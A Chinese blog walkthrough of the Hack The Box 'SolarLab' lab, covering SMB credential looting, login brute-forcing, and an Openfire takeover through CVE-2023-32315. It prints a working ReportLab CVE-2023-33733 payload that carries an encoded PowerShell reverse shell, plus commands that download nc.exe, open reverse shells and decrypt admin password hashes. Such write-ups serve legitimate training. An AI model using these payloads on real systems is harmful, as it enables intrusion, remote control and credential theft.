htb_solarlab

2024-06-06 02:52
文章标签 htb solarlab

本文主要是介绍htb_solarlab,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

在这里插入图片描述

端口扫描

80,445

在这里插入图片描述

子域名扫描

木有

在这里插入图片描述

尝试使用smbclient连接445端口

Documents目录可查看

在这里插入图片描述

将Documents底下的文件下载到本地看看

在这里插入图片描述

xlsx文件里有一大串用户信息,包括username和password

在这里插入图片描述

先弄下来

在这里插入图片描述

不知道在哪登录,也没有子域名,于是返回进行全端口扫描

多了一个6791端口

在这里插入图片描述

扫描后发现子域名,添加入/etc/hosts后访问

在这里插入图片描述

可以尝试登录了

在这里插入图片描述

用刚刚得到的用户名密码字典进行爆破,居然没成功

在这里插入图片描述

没辙了,去找别人的提示看看

说是要把用户名和邮箱首位拼在一起,得到一个新用户名blakeb

尝试固定用户名再次爆破

成功

在这里插入图片描述

blakeb ThisCanB3typedeasily1@

登入ReportHub

在这里插入图片描述

用来转pdf的

在这里插入图片描述

在这里插入图片描述

搜索后找到一个比较新的漏洞

CVE-2023-33733

 <para><font color="[ [ getattr(pow,Word('__globals__'))['os'].system('touch /tmp/exploited') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">exploit</font>
</para>

在这里插入图片描述

将powershell反弹shell和payload拼在一起

<para><font color="[ [ getattr(pow,Word('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAA3ACIALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==') for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] ] and 'red'">exploit</font>
</para>

在这里插入图片描述

成功反弹

在这里插入图片描述

查看文件后发现一个user.db

直接type随便看看

大概是一个新建表的脚本,里面有几个username和password,等会有用再回来看

在这里插入图片描述

查看端口开放netstat -ano

眼熟的9090

上传chisel转发出来

在这里插入图片描述

./chisellinux server -p 6150 --reverse./chiselw.exe client 10.10.14.87:6150 R:9090:127.0.0.1:9090 R:9091:127.0.0.1:9091

在这里插入图片描述

本地访问127.0.0.1:9090

版本4.7.4openfire

记得openfire有cve

在这里插入图片描述

CVE-2023-32315

可以直接添加用户获取shell

在这里插入图片描述

o30fib pfnkxi

登入后台

在这里插入图片描述

按着提示一步步走

在这里插入图片描述

上传openfire-managerment-tool-plugin.jar

在这里插入图片描述

输入123登入

在这里插入图片描述

可以执行cmd命令了

在这里插入图片描述

上传nc.exe反弹shell

curl http://10.10.14.87:3333/nc.exe -o nc.exenc.exe 10.10.14.87 2222 -e powershell

成功

在这里插入图片描述

查看用户权限,没有有用的

在这里插入图片描述

查看目录

发现openfire.script文件

在这里插入图片描述

查看后发现有administrator的用户凭据

在这里插入图片描述

不知道怎么利用,又去看了看别人的

需要下载利用文件

添加链接描述

解密出密码

java OpenFireDecryptPass.java becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442 hGXiFzsKaAeYLjn

在这里插入图片描述

ThisPasswordShouldDo!@

上传RunasCs.exe

在这里插入图片描述

./RunasCs.exe administrator ThisPasswordShouldDo!@ powershell -r 10.10.14.87:6666

在这里插入图片描述

成功提权
在这里插入图片描述

这篇关于htb_solarlab的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1034894

相关文章

HTB-You know 0xDiablos

引言 项目概述:HTB的EASY难度 PWN靶机 You know 0xDiablos https://app.hackthebox.com/challenges/106 本文详细解释了溢出payload的结构以及为什么要这样构造,友好的为想要入手PWN的朋友解释了原理技术点涉及: 32位linux逆向、32位程序调用、栈溢出目标与读者:网络安全兴趣爱好者、PWN新手 基本情况 运行看看

HTB-bike(SSTI模版注入)

前言 大家好,我是qmx_07,今天给大家讲解bike靶场 渗透过程 信息搜集 服务器开放了 22 ssh 和 http80端口 Wappalyzer 介绍:Wappalyzer是一种浏览器扩展程序,用于识别正在访问的网站所使用的技术栈和工具,比如使用的web框架,编程语言等 服务器所使用Express框架 发现SSTI模版注入 可以看到这个输入框,用来输出 内容尝试x

HTB-lgnition(curl工具、yakit、 弱口令)

前言 各位师傅大家好,我是qmx_07,今天来讲解lgnition靶机 渗透流程 信息搜集 服务器开放了80 http端口 curl工具 介绍:curl工具是一个用于发送HTTP请求的命令行工具。它支持多种协议,包括HTTP、HTTPS、FTP、SMTP等,并且支持各种常见的操作,如GET、POST、PUT、DELETE等。 -v显示输出与请求和响应相关的详细信息,包括请求头

HTB-Crocodile(FTP和web综合利用)

前言 各位师傅大家好,今天给大家讲解Crocodile靶机 渗透过程 信息搜集 服务器开放了21FTP和80HTTP服务思路:可以尝试 匿名登录FTP 或者 尝试WEB登录后台 FTP匿名登录 通过anonymous 匿名登录到FTP服务器allowed.userlist 和 allowed.usserlist.pass 分别是 账户和密码 Web目录爆破 服务器有

HTB-Mongod(MongoDb数据库)

前言 各位师傅大家好,我是qmx_07,今天给大家讲解Mongod靶场 Mongod 渗透过程 RustScan 介绍:Rustscan是一款用Rust语言开发的高速端口扫描器,它可以在3秒内扫描所有65535个端口,并支持脚本引擎和自适应学习功能,并且可以和nmap进行联动可以简单理解成 多线程的nmap扫描器 RustScan安装: 1.创建文件夹mkdir Rustsca

HTB-Redeemer(redis)

前言 各位师傅大家好,我是qmx_07,今天给大家讲解Redeemer这台机器,主要是对redis组件进行渗透,了解思路 渗透过程 更改一下 目录结构,先写 渗透过程,再写 题解 信息搜集 通过nmap扫描 发现开启了6379 redis服务,尝试连接注意:nmap 扫描 可以先确定端口开放情况,在进行系统版本扫描,这样会快一些 连接redis数据库 使用redis-cl

入门三.HTB--Dancing(6.18)

大佬 https://www.cnblogs.com/Hekeats-L/p/16535920.html 任务1 SMB 即Server Message Block(服务器消息块),是一种文件共享协议。当文件原件在你的A电脑上,而你想在局域网下用你的手机、iPad或是另一台电脑来访问A电脑上的该文件时,你可能需要用到SMB共享。 任务2 SMB端口服务 nmap -sV

htb_Freelancer

端口扫描 80 88 389 445 扫描ldap协议相关漏洞,没有发现 扫描子域名,加入/etc/hosts(后面发现没用) 枚举域用户 目录扫描,发现一个/admin目录 访问后发现要账号密码 访问80端口,注册一个freelancer用户 查看Blog,底部评论区可看见有用户 点击用户查看,发现修改url中的数字可以查看不同用户 当url为http://freel

SolarLab - hackthebox

简介 靶机名称:SolarLab 难度:中等 靶场地址:https://app.hackthebox.com/machines/SolarLab 本地环境 靶机IP :10.10.11.16 ubuntu渗透机IP(ubuntu 22.04):10.10.16.17 windows渗透机IP(windows11):10.10.14.20 扫描 nmap起手 nmap -sT -

[渗透测试学习] SolarLab-HackTheBox

SolarLab-HackTheBox 信息搜集 nmap扫描端口 nmap -sV -v 10.10.11.16 扫描结果如下 PORT STATE SERVICE VERSION80/tcp open http nginx 1.24.0135/tcp open msrpc Microsoft Windows RPC13